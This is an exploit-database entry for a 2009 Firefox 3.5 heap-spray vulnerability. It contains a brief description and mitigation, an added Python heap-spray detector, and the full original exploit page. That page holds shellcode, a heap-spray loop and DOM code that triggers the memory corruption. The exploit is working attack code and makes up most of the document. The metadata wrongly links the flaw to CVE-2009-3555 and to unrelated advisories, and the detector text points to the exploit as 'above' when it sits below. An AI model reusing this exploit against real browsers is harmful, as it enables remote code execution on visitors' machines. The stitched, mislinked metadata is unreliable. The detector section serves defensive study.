vendor: Firefox
by: SBerry aka Simon Berry-Byrne
CVSS: 9.3 (HIGH)
Heap Spray Vulnerability
CWE: 119
Product Name: Firefox
Affected Version From: 3.5
Affected Version To: 3.5.2
Patch Exists: YES
Related CWE: CVE-2009-3555
CPE: a:mozilla:firefox:3.5
Metasploit:
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0986/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0880/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0807/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0865/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0770/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0987/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0768/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0786/
https://www.rapid7.com/db/vulnerabilities/sunpatch-145102/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0440/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0338/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0130/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0337/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0339/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0167/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0162/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0119/
https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2009-3555/
https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-3555/
https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0019-cve-2009-3555/
https://www.rapid7.com/db/?q=CVE-2009-3555&type=&page=2
https://www.rapid7.com/db/?q=CVE-2009-3555&type=&page=3
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Firefox 3.5 Vulnerability

This vulnerability affects the Firefox 3.5 browser. It is a memory corruption flaw in the browser's JavaScript engine, reached through malicious JavaScript embedded in a web page and triggered as soon as the user visits that page. The exploit uses a heap spray to fill the browser's memory with copies of its payload, so that when the corruption is triggered execution lands in the sprayed code and the attacker gains control of the target system.

Mitigation:

The vulnerability can be mitigated by applying the latest security patches from Mozilla. Additionally, users should be aware of the risks associated with visiting untrusted websites and should avoid clicking on suspicious links.
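As an added example (not part of the Exploit-DB entry or the author's code), a small Python heuristic that scans a script body for the heap-spray indicators visible in the exploit above: a short unescape("%u....") building block, a self-doubling loop up to a large length cap, a loop filling an array with block + payload, and a long %u-escaped blob. The indicator weights and threshold are assumptions, and both samples are constructed.

```python
import re

# Indicator patterns with weights; the weights and threshold are assumptions for this example.
INDICATORS = {
    "unescape_unicode":  (re.compile(r'unescape\s*\(\s*"(?:%u[0-9a-fA-F]{4})+"'), 2),
    "self_doubling":     (re.compile(r'\b(\w+)\s*\+=\s*\1\b'), 3),
    "large_length_cap":  (re.compile(r'\.length\s*<\s*0x[0-9a-fA-F]{5,}'), 2),
    "array_fill_loop":   (re.compile(r'\w+\s*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+'), 2),
    "long_escaped_blob": (re.compile(r'(?:%u[0-9a-fA-F]{4}){20,}'), 3),
}
SUSPICIOUS_THRESHOLD = 6

def scan(js: str) -> dict:
    """Return indicator hits, a weighted score and a verdict for one script body."""
    # Join adjacent string literals ("..." + "...") so a blob split over lines is seen whole.
    joined = re.sub(r'"\s*\+\s*"', '', js)
    hits = {name: bool(rx.search(joined)) for name, (rx, _) in INDICATORS.items()}
    score = sum(w for name, (_, w) in INDICATORS.items() if hits[name])
    return {"score": score, "hits": hits, "suspicious": score >= SUSPICIOUS_THRESHOLD}

# Constructed sample mirroring the structure of the spray code above (filler bytes, no payload).
SPRAY_SAMPLE = (
    'var sc = unescape("' + "%u4141" * 12 + '" +\n'
    '                  "' + "%u4242" * 12 + '");\n'
    'oneblock = unescape("%u0c0c%u0c0c");\n'
    'var fullblock = oneblock;\n'
    'while (fullblock.length<0x60000) { fullblock += fullblock; }\n'
    'sprayContainer = new Array();\n'
    'for (i=0; i<600; i++) { sprayContainer[i] = fullblock + sc; }\n'
)

# Constructed benign sample: one escaped character and an ordinary array assignment.
BENIGN_SAMPLE = (
    'var s = unescape("%u00e9");\n'
    'var buf = "";\n'
    'for (var i = 0; i < 10; i++) { buf += "x"; }\n'
    'items[i] = first + second;\n'
)

if __name__ == "__main__":
    for label, sample in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = scan(sample)
        print(label, r["score"], "suspicious" if r["suspicious"] else "ok",
              [k for k, v in r["hits"].items() if v])
```

Single indicators such as an array assignment or a one-character unescape() occur in ordinary pages, which is why the verdict comes from the combined score rather than any one match.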
Source

Exploit-DB raw data:

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
</head>
<body>
Firefox 3.5 Heap Spray Vulnerability
<br/>
Author: SBerry aka Simon Berry-Byrne
<br/>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]